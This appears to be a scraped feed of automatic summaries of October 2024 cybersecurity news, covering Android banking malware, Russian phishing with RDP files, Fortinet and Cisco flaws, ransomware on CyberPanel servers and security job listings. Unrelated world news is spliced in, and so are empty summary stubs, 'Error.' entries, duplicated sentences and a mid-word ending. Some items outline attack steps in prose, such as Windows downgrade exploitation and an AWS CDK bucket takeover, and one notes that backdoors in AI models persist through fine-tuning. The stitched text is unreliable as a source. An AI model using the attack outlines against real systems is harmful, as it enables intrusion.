On October 17, the vendor, LiteSpeed Technologies, released a fix for CVE-2024-50550 in version 6.5.2 of the plugin, improving the hash value randomness and making brute-forcing them practically infeasible. "Autosummary:
"Autosummary:
Likely without realizing, when the user gives the app permission to set it as the default call handler, the malware gains permission to intercept and manipulate both outgoing and incoming calls. "Autosummary:
Image Fortunately, there are simple steps you can take to reduce the chances that you fall foul of such scams: Be wary of unexpected calls, text messages, emails, or surveys, especially if they ask for personal information. "Autosummary:
" The plugins can capture a wide range of data, including Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, as well as gather information from apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp. "Autosummary:
"Autosummary:
QNAP fixed second zero-day demonstrated at Pwn2Own Ireland 2024 Pierluigi Paganini October 31, 2024 October 31, 2024 QNAP addressed the second zero-day vulnerability demonstrated by security researchers during the recent Pwn2Own Ireland 2024. "Autosummary:
New version of Android malware FakeCall redirects bank calls to scammers Pierluigi Paganini October 31, 2024 October 31, 2024 The latest FakeCall malware version for Android intercepts outgoing bank calls, redirecting them to attackers to steal sensitive info and bank funds. "Autosummary:
"Autosummary:
"Medical practices remain vulnerable to cyberattacks, with over a third unable to cite a cybersecurity incident response plan, according to Software Advice. This gap exposes healthcare providers to risks of patient data breaches, HIPAA violations, financial penalties, and patient safety concerns. The findings come at a critical time, as the Health Infrastructure Security and Accountability Act seeks to establish minimum cybersecurity standards across the healthcare industry. Software Advice’s survey found that 59% of medical practices … More
The post 6 key elements for building a healthcare cybersecurity response plan appeared first on Help Net Security.
"Autosummary:
“Downtime from a cyberattack can disrupt production, profits, and reputation for most businesses, but in healthcare, it means inaccessible medical records, malfunctioning devices, and delayed critical procedures,” said Lisa Morris, associate principal medical analyst at Software Advice. "Midnight Blizzard – a cyber espionage group that has been linked to the Russian Foreign Intelligence Service (SVR) – is targeting government, academia, defense, and NGO workers with phishing emails containing a signed Remote Desktop Protocol (RDP) configuration file. “Based on our investigation of previous Midnight Blizzard spear-phishing campaigns, we assess that the goal of this operation is likely intelligence collection,” Microsoft’s threat analysts say. Midnight Blizzard Midnight Blizzard (aka Cozy Bear, APT29, and UNC2452) … More
The post Russian hackers deliver malicious RDP configuration files to thousands appeared first on Help Net Security.
"Autosummary:
As the Ukrainian CERT team recently warned, running the malicious file will establish an outgoing RDP connection with the attackers’ server, allowing the server access to disks, network resources, printers, COM ports, audio devices, the clipboard and other resources (including credentials) on the targets’ computer, as well as put into place technical prerequisites for running third-party programs or scripts. "Autosummary:
Google fixed a critical vulnerability in Chrome browser Pierluigi Paganini October 30, 2024 October 30, 2024 Google addressed a critical vulnerability in its Chrome browser, tracked as CVE-2024-10487, which was reported by Apple. "Autosummary:
"Autosummary:
The 10-storey Dubrovnik hotel, in the coastal city of Villa Gesell, collapsed early on Tuesday, with a local describing the scene as resembling a "horror movie". "Autosummary:
"Autosummary:
However, this led the threat actors to frequently rebrand under different names, like WastedLocker, Hades, Phoenix CryptoLocker, PayLoadBin, and Macaw, to evade sanctions. "Autosummary:
A new phone listener service establishes a communication channel with the attacker"s command and control (C2) server, allowing them to issue commands to perform various actions, like get device location, delete apps, record audio or video, and edit contacts. Overview of latest FakeCall attacks Source: Zimperium New features and improvements Despite heavier code obfuscation, Zimperium also discovered that the latest FakeCall versions add several improvements and attack mechanisms, though some are still under development. "XM Cyber launched its innovative Vulnerability Risk Management (VRM) solution, extending its Continuous Exposure Management Platform. This new approach to vulnerability management empowers organizations to see through the fog of false positives left behind by legacy vulnerability assessment tools and confidently embrace an innovative new security methodology. XM Cyber’s Vulnerability Risk Management provides an approach to discover, quantify, and reduce the risk presented by common vulnerabilities. By correlating CVE-related risk attributes with real-world attack techniques … More
The post XM Cyber Vulnerability Risk Management boosts prioritization with actual impact analysis appeared first on Help Net Security.
"Autosummary:
The key capabilities of XM Cyber’s Vulnerability Risk Management include: Prioritizing high-impact risks : Organizations can now focus on vulnerabilities that present the greatest risk to the business with contextualized views that allow prioritization based on various risk attributes and threat context, from exploit likelihood to business impact risk. "A threat actor – or possibly several – has hit approximately 22,000 vulnerable instances of CyberPanel and encrypted files on the servers running it with the PSAUX and other ransomware. The PSAUX ransom note (Source: LeakIX) The CyberPanel vulnerabilities CyberPanel is a widely used open-source control panel that’s used for managing servers used for hosting websites. Two critical command injection vulnerabilities (CVE-2024-51378 and CVE-2024-51567) affecting CyberPanel versions 2.3.6 and (unpatched) 2.3.7 have been publicly documented … More
The post Ransomware hits web hosting servers via vulnerable CyberPanel instances appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy, Silent Chollima, and Stonefly. "Autosummary:
" The primary vector through which SYS01stealer is distributed is via malvertising across platforms like Facebook, YouTube, and LinkedIn, with the ads promoting Windows themes, games, AI software, photo editors, VPNs, and movie streaming services. "Because the email is sent via Eventbrite"s verified domain and IP address, it is more likely to pass email filters, successfully reaching the recipient"s inbox," Perception Point said. "Autosummary:
Stolen Interbank data up for sale (BleepingComputer) The threat actor claims they were able to steal Interbank customers" full names, account IDs, birth dates, addresses, phone numbers, email addresses, and IP addresses, as well as credit card and CVV numbers, credit card expiry dates, info on bank transactions, and other sensitive information, including plaintext credentials. "Autosummary:
Microsoft warns of a large-scale spear-phishing campaign by Russia-linked APT Midnight Blizzard (aka APT29, SVR group, BlueBravo, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes), targeting 1,000+ users across 100+ organizations for intelligence gathering. "Autosummary:
"API Gateway Security Engineer Ness Technologies | Israel | Hybrid – View job details As an API Gateway Security Engineer, you will be responsible for managing and implementing API Gateway solutions with a strong focus on information security. Your responsibilities will include ongoing maintenance of API systems, managing secure permissions and access, monitoring API traffic to identify anomalies, threats, and intrusion attempts, and collaborating with security and infrastructure teams to identify and manage security risks, … More
The post Cybersecurity jobs available right now: October 29, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Cybersecurity Architect Kyndryl | France | Hybrid – View job details As a Senior Cybersecurity Architect, you will design the integration of various security technologies, including EDR, SIEM, and DLP solutions, within complex IT environments spanning on-premises, cloud, and hybrid infrastructures. Network Security Engineer DRW | United Kingdom | On-site – View job details As a Network Security Engineer, you will architect, troubleshoot, and implement firewalls, intrusion detection/prevention systems (IDPS), and VPN concentrators into new or existing networks. Senior Security Engineer, Firmware Roku | United Kingdom | On-site – View job details As a Senior Security Engineer, Firmware, you will develop new product solutions for cryptographic key programming, secure boot, and secure enclave. "In this Help Net Security video, John Bennett, CEO at Dashlane, discusses their recent Global Password Health Score Report, detailing the global state of password health and hygiene. Poor security habits like password reuse remain widespread. With passwordless technologies like passkeys still in their early stages of adoption, organizations must remain vigilant. The risk of weak, reused, and compromised passwords fuels credential-based breaches, underscoring the need for stronger password management practices even as new technologies … More
The post The state of password security in 2024 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" It"s used as a way to help counter Branch Target Injection (BTI), aka Spectre v2 (CVE-2017-5715), a cross-domain transient execution attack (TEA) that takes advantage of indirect branch predictors used by processors to cause a disclosure gadget to be speculatively executed. "Despite two patching attempts, a security issue that may allow attackers to compromise Windows user’s NTLM (authentication) credentials via a malicious Windows themes file still affects Microsoft’s operating system, 0patch researchers have discovered. The path to discovery The story starts with CVE-2024-21320, a Windows Themes spoofing vulnerability that was reported by Akamai security researcher Tomer Peled and fixed by Microsoft in January 2024. The vulnerability could be triggered by a .theme file that specified a … More
The post Patching problems: The “return” of a Windows Themes spoofing vulnerability appeared first on Help Net Security.
"Autosummary:
Getting a user to view a theme file in Windows Explorer, on the other hand, may be a simple matter of forcing a download of the theme file while the user is on attacker’s web page, then waiting for the user to open the Downloads folder (depending on the view type of the Downloads folder).”In addition, for credentials leak to occur on a server it’s not enough just to view a theme file in Windows Explorer or on desktop; rather, the theme file needs to be double-clicked and the theme thus applied,” 0patch researchers explained. "PIXM Security launched its new Managed Service Provider (MSP) program for zero-day phishing protection. With over 500,000 end users already protected, PIXM shields MSPs and their customers from credential theft and zero-day phishing attacks that can lead to malware and other exploits on their laptops, desktops and mobile platforms. Over 50 percent of phishing links are clicked outside corporate email. While phishing security is often associated solely with email protection, cybercriminals are adapting and increasingly … More
The post PIXM protects MSPs from credential theft and phishing attacks appeared first on Help Net Security.
"Autosummary:
While phishing security is often associated solely with email protection, cybercriminals are adapting and increasingly exploiting other channels such as SMS, social media platforms (such as Facebook), SaaS work apps (such as Slack and Google Docs), and even QR codes to deliver phishing attacks. "Autosummary:
Discover how the Picus Security Validation Platform seamlessly integrates with your existing systems, the broadest exposure validation capabilities through advanced capabilities like Breach and Attack Simulation (BAS), Automated Penetration Testing, and Red Teaming to help you reduce risk, save time, and fortify your defenses against evolving threats. The Holes in Your Armor: What Threat Exposures Mean In cybersecurity, exposure is a vulnerability, misconfiguration, or security gap existing in an organization"s IT environment, which could be used by any threat actor.Even Mr. Spock echoed this logic, remarking, "An ancestor of mine maintained that if you eliminate the impossible, whatever remains, however improbable, must be the truth." CTEM consists of five key phases: Scoping, Discovery, Prioritization, Validation, and Mobilization. "Autosummary:
The operation was spearheaded by the Dutch police working with international partners, including the FBI, U.S. Department of Justice, and Eurojust, achieving unprecedented disruption to two highly impactful MaaS operations that have stolen millions of account credentials. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
“An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.” reads the SonicWall’s advisory. “An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash.” reads the advisory. "Autosummary:
Russia-linked espionage group UNC5812 targets Ukraine’s military with malware Pierluigi Paganini October 29, 2024 October 29, 2024 Suspected Russia-linked espionage group UNC5812 targets Ukraine’s military with Windows and Android malware via Telegram. "Autosummary:
"The point is that the landscape is definitely settled - that is, settled in the past - and not, as it appears to the naked eye, uninhabited or ‘wild’," she says. The ruins were found in eastern Mexico, in Campeche Professor Elizabeth Graham from University College London, who was not involved in the research, says it supports claims that Maya lived in complex cities or towns, not in isolated villages. "Autosummary:
"Threat actors continue to probe the payments ecosystem for vulnerabilities and were successful in conducting fraud schemes affecting multiple financial institutions, technologies, and processes, according to Visa. The resurgence of physical theft Scammers are going back to basics with an increase of physical theft over the past six months, capitalizing on the window between the theft and the victim’s awareness. After a theft, the most common ways the criminals are capitalizing on their theft by … More
The post Fraudsters revive old tactics mixed with modern technology appeared first on Help Net Security.
"Autosummary:
The threat actor toolbox has evolved to include an expanding collection of cybercrime-as-a-service offerings, such as proxy networks, ransomware-as-a-service variants, and fraud tutorials, enabling them to scale their campaigns more effectively. Similarly, in March of 2023, Visa identified an emerging threat dubbed “digital pickpocketing,” where cybercriminals use a mobile point-of-sale device to tap against unsuspecting consumers’ wallets and initiate a payment, often in crowded areas. "In this Help Net Security video, Jake King, Head of Threat & Security Intelligence at Elastic, discusses the key findings from the 2024 Elastic Global Threat Report. Adversaries are utilizing off-the-shelf tools Offensive security tools (OSTs), including Cobalt Strike and Metasploit, made up ~54% of observed malware alerts Cobalt Strike accounted for 27% of malware attacks Enterprises are misconfiguring cloud environments, allowing adversaries to thrive Nearly 47% of Microsoft Azure failures were tied to storage … More
The post Adversarial groups adapt to exploit systems in new ways appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Ultimately, the exploitation steps an attacker needs to follow are below - Turning off VBS in the Windows Registry, or invalidating SecureKernel.exe Downgrading ci.dll to the unpatched version Restarting the machine Exploiting ItsNotASecurityBoundary DSE bypass to achieve kernel-level code execution The only instance where it fails is when VBS is turned on with a UEFI lock and a "Mandatory" flag, the last of which causes boot failure when VBS files are corrupted. "Autosummary:
"The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms, as well as Microsoft 365 login credentials," Netskope Threat Labs researcher Jan Michael Alcantara said in an analysis. "Autosummary:
Washington’s disapproval of the measure, as publicly expressed by the US Ambassador to Mexico, Ken Salazar, suggested it could complicate, even jeopardise, parts of the USMCA renegotiation.Sheinbaum must strike a difficult balance, he adds, in getting Pemex to sell more of its products “which are obviously fossil fuels and oil-based, while at the same time addressing Mexico’s climate change responsibilities and dealing with urgent issues in our cities, like air pollution”. "Autosummary:
" Redline and Meta are both infostealers, a type of malware that steals stored information from browsers on an infected device, including credentials, authentication cookies, browsing history, sensitive documents, SSH keys, and cryptocurrency wallets. Moreover, the authorities claimed they got access to the source code, including license servers, REST-API services, panels, stealer binaries, and Telegram bots, for both malware. "Entrust announced an all-in-one consumer banking platform that allows banks and credit unions to provide high-assurance security throughout the customer lifecycle – from account opening to financial credential issuance to on-going, everyday transactions and interactions. The solution integrates leading AI-driven identity verification technology with physical and digital card issuance capabilities to transform the consumer banking experience, dramatically reducing fraud at account opening and providing smart continuous account protection. Approximately 82% of consumers say they access … More
The post Entrust helps banks fight fraud during account opening appeared first on Help Net Security.
"Autosummary:
Empowering financial institutions to unlock scale and acquire more customers through digital identity verification, establishing high assurance in their customers through document validation, biometric liveness detection, and a suite of fraud signals, underpinned by award-winning AI technology. "Autosummary:
After the malware was publicly exposed by Cyfirma in late August 2023, EVLF, the threat actor behind the project, decided to cease activity, but not before selling their Telegram channel to a Chinese-speaking threat actor. "Autosummary:
"Autosummary:
Get the Guide ️🔥 Trending CVEs CVE-2024-41992, CVE-2024-20481, CVE-2024-20412, CVE-2024-20424, CVE-2024-20329, CVE-2024-38094, CVE-2024-8260, CVE-2024-38812, CVE-2024-9537, CVE-2024-48904 🔔 Top News Severe Cryptographic Flaws in 5 Cloud Storage Providers: Cybersecurity researchers have discovered severe cryptographic issues in end-to-end encrypted (E2EE) cloud storage platforms Sync, pCloud, Icedrive, Seafile, and Tresorit that could be exploited to inject files, tamper with file data, and even gain direct access to plaintext.Cybersecurity researchers have discovered severe cryptographic issues in end-to-end encrypted (E2EE) cloud storage platforms Sync, pCloud, Icedrive, Seafile, and Tresorit that could be exploited to inject files, tamper with file data, and even gain direct access to plaintext.SEC Fines 4 Companies for Misleading SolarWinds Disclosures: The U.S. Securities and Exchange Commission (SEC) charged four public companies, Avaya, Check Point, Mimecast, and Unisys, for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020. The U.S. Securities and Exchange Commission (SEC) charged four public companies, Avaya, Check Point, Mimecast, and Unisys, for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020.4 REvil Members Sentenced in Russia: Four members of the now-defunct REvil ransomware operation, Artem Zaets, Alexei Malozemov, Daniil Puzyrevsky, and Ruslan Khansvyarov, have been sentenced to several years in prison in Russia.To enhance DNS security, use a privacy-focused resolver that doesn"t track your searches (a private catalog), block malicious sites using a "hosts" file (rip out the cards for dangerous books), and employ a browser extension with DNS filtering (hire a librarian to keep an eye out). "Autosummary:
The Windows download installs Pronsis Loader, a malware loader that fetches additional malicious payloads from UNC5812"s server, including the commodity info-stealer "PureStealer." PureStealer targets information stored in web browsers, like account passwords, cookies, cryptocurrency wallet details, email clients, and messaging app data. "Autosummary:
However, the attackers failed to access customer passwords, bank card information, and communications content (including "emails, SMS, voice messages, etc."). "Autosummary:
Still, its statement aims to remind important organizations in the country to implement strict security measures, including multi-factor authentication protection, logging, traffic monitoring, and anti-phishing training. "Autosummary:
“No passwords” , “no bank cards” , “no content of communications (emails, SMS, voice messages, etc.)” are affected by this attack, the date and extent of which have not been specified, the company added. "Autosummary:
"Autosummary:
As Guido Gerrits, EMEA Field Channel Director at IAM vendor Thales, explains, The progress of IAM has resulted in the inclusion of functionalities like single sign-on, multi-factor authentication, adaptive access controls, and identity governance.Plus, you can orchestrate user journey flows, customizing fundamental digital interactions like: Onboarding Logins Self-Service With IAM, seamless integration is possible across a range of applications, from WhatsApp to Salesforce to Splunk.Third-Party Identities: The Weakest Link in Your Cybersecurity Supply Chain Pierluigi Paganini October 28, 2024 October 28, 2024 A long supply chain adds third-party risks, as each partner’s security affects your own, making identity and access management more challenging.As companies jump online, into the cloud, into SaaS, deeper into cyberspace, and further into third-party dependency, locking down their access points is of critical concern. "Autosummary:
"Autosummary:
"Autosummary:
[embed lemonde-article.jpeg] However, according to the firm, no passwords, bank card information, or the contents of communications (emails, SMS, or voicemails) were compromised by the attack. "Autosummary:
Vasinskyi (aka Profcomserv, Rabotnik, Rabotnik_New, Yarik45, Yaraslav2468, and Affiliate 22) was arrested on October 8, 2021, while he was trying to enter Poland. "Autosummary:
Akira, a far more established player in the ransomware space, has recently had Tor website access problems, as observed by BleepingComputer, but those are gradually returning online now. "Autosummary:
"Autosummary:
The hacking contest pits security researchers against various software and hardware products, in an attempt earn the "Master of Pwn" title by compromising targets in eight categories ranging from mobile phones, messaging apps, home automation, and smart speakers to printers, surveillance systems, network-attached storage (NAS), and SOHO Smash-up. "Autosummary:
"Autosummary:
"I was able to make a fully patched Windows machine susceptible to past vulnerabilities, turning fixed vulnerabilities unfixed and making the term “fully patched” meaningless on any Windows machine in the world" - Alon Leviev Despite kernel security improving significantly over the years, Leviev managed to bypass the Driver Signature Enforcement (DSE) feature, showing how an attacker could load unsigned kernel drivers to deploy rootkit malware that disables security controls and hides activity that could lead to detecting the compromise. "Autosummary:
AFP Cuba"s energy infrastructure needs more investment, economists say Speaking last Sunday, at the height of what was Cuba’s most acute energy crisis in years, the country’s energy and mines minister, Vicente de la O Levy, blamed the problems for the country’s creaking electrical infrastructure on what he called the “brutal” US economic embargo on Cuba.“It’s especially hard on the children”, Marbeyis adds, her eyes tearing up, “because when they say I want this or that, we have nothing to give them.”“We’ve had no power for six days”, she says, brewing coffee on a makeshift charcoal stove inside her breeze-block, tin-roofed shack.In every step, a lot of investment is needed,” says Cuban economist, Ricardo Torres, at the American University in Washington DC. "Threat actors have been leveraging zero and n-day vulnerabilities in Cisco security appliances (CVE-2024-20481), Microsoft Sharepoint (CVE-2024-38094), and Google’s Chrome browser (CVE-2024-4947). CVE-2024-20481 (Cisco ASA/FTD) In the past few days, Cisco has released fixes for a slew of vulnerabilities affecting the software powering its security appliances. Among them several are of particular note: CVE-2024-20481, a vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense … More
The post Exploited: Cisco, SharePoint, Chrome vulnerabilities appeared first on Help Net Security.
"Autosummary:
Among them several are of particular note: CVE-2024-20481, a vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software, which could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service. "Autosummary:
"Backdoors created using this technique will persist through fine-tuning, meaning foundation models can be hijacked to trigger attacker-defined behavior in any downstream application when a trigger input is received, making this attack technique a high-impact AI supply chain risk," Hidden Layer researchers Eoin Wickens, Kasimir Schulz, and Tom Bonner said. "Autosummary:
"Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.And 2024 looks even worse, she added: “And this year, with both the Change breach and Ascension breach, we expect that number to potentially double or go higher.” "Autosummary:
The accounts are created under Entra ID tenants that are named to appear to be help desk, like: securityadminhelper.onmicrosoft[.]com supportserviceadmin.onmicrosoft[.]com supportadministrator.onmicrosoft[.]com cybersecurityadmin.onmicrosoft[.]com "These external users set their profiles to a "DisplayName" designed to make the targeted user think they were communicating with a help-desk account," explains the new ReliaQuest report. "Autosummary:
As reported by The Record, eight members were ultimately tried, with Artem Zayets, Alexey Malozemov, Daniil Puzyrevsky, and Ruslan Khansvyarov sentenced today and four others put into a separate proceeding. "Autosummary:
“Our experts are working to address the matter and we are working closely with law enforcement and leading third-party consultants, Mandiant and Palo Alto Network, on this attack against Change Healthcare’s systems” Compromised data includes names, addresses, dates of birth, phone numbers, driver’s license or state ID numbers, Social Security numbers, diagnosis and treatment information, medical record numbers, billing codes, insurance member IDs, and other types of information. "Autosummary:
The compromised data includes names, residence information, medical records, diagnosis, prescription details, and, for some, Social Security numbers. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-20481 Cisco ASA and FTD Denial-of-Service Vulnerability CVE-2024-37383 RoundCube Webmail Cross-Site Scripting (XSS) Vulnerability This week, Cisco addressed multiple vulnerabilities in Adaptive Security Appliance (ASA), Secure Firewall Management Center (FMC), and Firepower Threat Defense (FTD) products, including an actively exploited flaw tracked as CVE-2024-20481.U.S. CISA adds Cisco ASA and FTD, and RoundCube Webmail bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 25, 2024 October 25, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco ASA and FTD, and RoundCube Webmail bugs to its Known Exploited Vulnerabilities catalog. "Autosummary:
The dam collapse in 2015 destroyed many villages and engulfed homes The mining giants BHP and Vale have signed a deal with the Brazilian government to pay nearly $30bn (£23bn) in compensation for the Mariana dam collapse in 2015 that caused the country"s worst environmental disaster. "Autosummary:
Jair Bolsonaro has applied against Venezuela for years, reproducing the hatred, exclusion and intolerance promoted from the centres of power in the West," the Venezuelan foreign ministry said in a statement. "Autosummary:
"AI impersonation is now the hardest vector for cybersecurity professionals to protect companies against, according to Teleport. The study, which surveyed 250 senior US and UK decision-makers, shows that social engineering remains one of the top tactics cybercriminals use to install malware and steal sensitive data, with the advancement of AI and deepfakes further fueling the effectiveness of phishing scams. Advanced phishing tactics on the rise When asked to rank the difficulty of each attack … More
The post AI and deepfakes fuel phishing scams, making detection harder appeared first on Help Net Security.
"Autosummary:
As it stands, credentials are pretty much littered across the many disparate layers of the technology stack – Kubernetes, servers, cloud APIs, specialized dashboards and databases, and more.” "When building a cybersecurity team, you likely asked yourself, “Should I focus on certifications or real-world skills?” And since you rarely encounter entry-level candidates who can hit the ground running, naturally, you’d consider a candidate with both. But that’s not always the best option unless you have the time, money, and patience. One of these factors usually has a priority over the other. Your starting point or a nice-to-have? ISACA’s State of Cybersecurity 2024 Report … More
The post What’s more important when hiring for cybersecurity roles? appeared first on Help Net Security.
"Autosummary:
Sometimes, you’ll need certifications; other times, you’ll need skills, and if you’re lucky, you’ll get a good mix of both! If risk mitigation is your priority, then skilled candidates have the hands-on experience to resolve issues faster; however, they come with a higher initial cost. And since you rarely encounter entry-level candidates who can hit the ground running, naturally, you’d consider a candidate with both. "Autosummary:
"Autosummary:
The vulnerability impacts the following versions: Version Affected Solution FortiManager 7.6 7.6.0 Upgrade to 7.6.1 or above FortiManager 7.4 7.4.0 through 7.4.4 Upgrade to 7.4.5 or above FortiManager 7.2 7.2.0 through 7.2.7 Upgrade to 7.2.8 or above FortiManager 7.0 7.0.0 through 7.0.12 Upgrade to 7.0.13 or above FortiManager 6.4 6.4.0 through 6.4.14 Upgrade to 6.4.15 or above FortiManager 6.2 6.2.0 through 6.2.12 Upgrade to 6.2.13 or above FortiManager Cloud 7.6 Not affected Not Applicable FortiManager Cloud 7.4 7.4.1 through 7.4.4 Upgrade to 7.4.5 or above FortiManager Cloud 7.2 7.2.1 through 7.2.7 Upgrade to 7.2.8 or above FortiManager Cloud 7.0 7.0.1 through 7.0.12 Upgrade to 7.0.13 or above FortiManager Cloud 6.4 6.4 all versions Migrate to a fixed release Fortinet published IOCs to detect exploitation attempts of this issue and provided workarounds to mitigate the risk of attacks exploiting this vulnerability. "Fortinet has finally made public information about CVE-2024-47575, a critical FortiManager vulnerability that attackers have exploited as a zero-day. About CVE-2024-47575 CVE-2024-47575 is a vulnerability stemming from missing authentication for a critical function in FortiManager’s fgfmd daemon. Remote, unauthenticated attackers could exploit the flaw to execute arbitrary code or commands via specially crafted requests. It affects various versions of FortiManager and FortiManager Cloud, as well as some older FortiAnalyzer models. “Reports have shown this vulnerability … More
The post Fortinet FortiManager flaw exploited in zero-day attacks (CVE-2024-47575) appeared first on Help Net Security.
"Autosummary:
“The threat actor has been combo’ing the other CISA KEV vuln (from earlier in the year) to enter FortiGate, then used this to enter the managing FortiManager, and then using that to go back downstream – i.e. jumping over zoned networks,” he summed up the in-the-wild attacks. "Autosummary:
Even more troubling, RISK & INSURANCE, a leading publication from the cybersecurity insurance industry, reported that the median ransom grew to $20 million in 2023, up significantly from $1.4 million in 2022, while actual payments surged to $6.5 million, compared to $335,000 previously.Cybercriminals are easily bypassing legacy MFA solutions through phishing, SIM swapping, Man-in-the-Middle (MitM) attacks, and more.In their advisory AA24-242A, DHS/CISA and the FBI told the entire cybercriminal-stopping world that to stop ransomware attacks, organizations needed to implement phishing-resistant MFA and ditch SMS-based OTP MFA. "Autosummary:
"On the surface, this website resembled a professionally designed product page for a decentralized finance (DeFi) NFT-based (non-fungible token) multiplayer online battle arena (MOBA) tank game, inviting users to download a trial version," Kaspersky researchers Boris Larin and Vasily Berdnikov said. "Autosummary:
FortiJump flaw CVE-2024-47575 has been exploited in zero-day attacks since June 2024 Pierluigi Paganini October 24, 2024 October 24, 2024 The “FortiJump” flaw (CVE-2024-47575) has been exploited in zero-day attacks since June 2024, impacting over 50 servers, says Mandiant.For configuration, the “fgfm-deny-unknown” setting must be enabled using the following command: config system global set fgfm-deny-unknown enable end Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Fortinet FortiManager flaw FortiJump) "Autosummary:
Veeam (backup and recovery) Windows Volume Shadow Copy Service (system backup and recovery) SQL database services (enterprise data management) Sophos (security and antivirus software) Acronis Agent (backup and recovery service) SAP (enterprise resource planning) Existing volume shadow copies are wiped to prevent easy system restoration, and Windows Event Logs are cleared to hinder forensic analysis. "Autosummary:
Attacker-controlled FortiManager-VM Source: Mandiant As part of the attack, Mandiant says four files were created: /tmp/.tm - A gzip archive containing exfiltrated information about managed FortiGate devices, information about the FortiManager server, and its global database. "Autosummary:
Although malware targeting Apple devices actually predates viruses written for PCs, and there have been some families of malware that have presented a significant threat for both operating systems (for instance, the Word macro viruses that hit computers hard from 1995 onwards), it is generally the case that you"re simply a lot less likely to encounter malware on your Mac than you are on your Windows PC. "Autosummary:
However, for this to succeed, the attacker is expected to fulfil the below prerequisites - Claim the bucket with the predictable name and allow public access Create a Lambda function that will inject a malicious admin role or backdoor into a given CloudFormation template file whenever it"s uploaded to the bucket In the final stage, when the user deploys the CDK using "cdk deploy," not only does the process send the template to the replica bucket, but also inject an admin role that the attacker can assume to ultimately gain control of the victim"s account. Aqua said the naming pattern of the IAM roles created by AWS CDK follows the structure "cdk-{Qualifier}-{Description}-{Account-ID}-{Region}," where each of the fields are explained below - Qualifier, a unique, nine-character string value that defaults to "hnb659fds" although it can be customized during the bootstrapping phase Description, resource description (e.g., cfn-exec-role) Account-ID, AWS account ID of the environment Region, AWS region of the environment In a similar vein, the S3 bucket created during bootstrapping follows the naming pattern "cdk-{Qualifier}-assets-{Account-ID}-{Region}. "Autosummary:
A presence of static accounts with hard-coded passwords vulnerability in FTD Software for Cisco Firepower 1000, 2100, 3100, and 4200 Series that could allow an unauthenticated, local attacker to access an affected system using static credentials (CVSS score: 9.3) - A presence of static accounts with hard-coded passwords vulnerability in FTD Software for Cisco Firepower 1000, 2100, 3100, and 4200 Series that could allow an unauthenticated, local attacker to access an affected system using static credentials CVE-2024-20424 (CVSS score: 9.9) - "Autosummary:
"Autosummary:
"Out of the 99 healthcare organizations that admitted to paying the ransom and disclosed the ransom paid, the median payment was $1.5 million, and the average payment was $4.4 million," the tech giant said. "Autosummary:
Cisco fixed tens of vulnerabilities, including an actively exploited one Pierluigi Paganini October 24, 2024 October 24, 2024 Cisco patched vulnerabilities in ASA, FMC, and FTD products, including one actively exploited in a large-scale brute-force attack campaign. "Autosummary:
To make it easier for researchers, Apple decided to release the source code for some PCC components that implement security and privacy requirements: The CloudAttestation project - responsible for constructing and validating the PCC node’s attestations. "Autosummary:
"Autosummary:
#Pwn2Own #P2OIreland pic.twitter.com/tRW8f20NU8 — Zero Day Initiative (@thezdi) October 23, 2024 Corentin BAYET (@OnlyTheDuck) of @Reverse_Tactics chained three bugs to exploit the QNAP QHora-322 to QNAP TS-464, earning $41,750 and 8.5 Master of Pwn points, though one bug had been used before. "Cybersecurity Engineer Texas Instruments | USA | On-site – View job details As a Cybersecurity Engineer, you will design, implement and maintain cybersecurity controls for security tools to help drive zero trust and secure by design principles across complex environments. Validate and test security configurations and controls to a variety of security (e.g., firewalls, email gateway, WAFs, DLP, endpoint protection, baselines, etc.). Cyber Security Architect – Product Security Honeywell | USA | On-site – View … More
The post Cybersecurity jobs available right now: October 23, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Manager, IT – Vulnerability and Attack Surface Management Kraft Heinz | Canada | On-site – View job details As a Senior Manager, IT – Vulnerability and Attack Surface Management, you will ensure timely identification, analysis, and remediation of vulnerabilities across all IT assets, including applications, servers, networks, and endpoints. Software Security Manager Ingenico | France | On-site – View job details As a Software Security Manager, you will define the software security strategy aligned with company objectives and regulatory requirements and elaborate with development & operation teams the methods, tools and policies to support the security model, in particular Security by design, Secure Software Development Life Cycle, Vulnerability management, security-awareness trainings. Cyber Security Architect – Product Security Honeywell | USA | On-site – View job details As a Cyber Security Architect -Product Security, you will support secure lifecycle process activities for SaaS and On-Prem Offerings, including security requirements, threat modeling, risk assessment, analysis of findings from penetration tests, and tools. Deputy CISO Novanta | USA | Remote – View job details As a Deputy CISO, you will be responsible for developing and maintaining a security architecture process, the security operations center 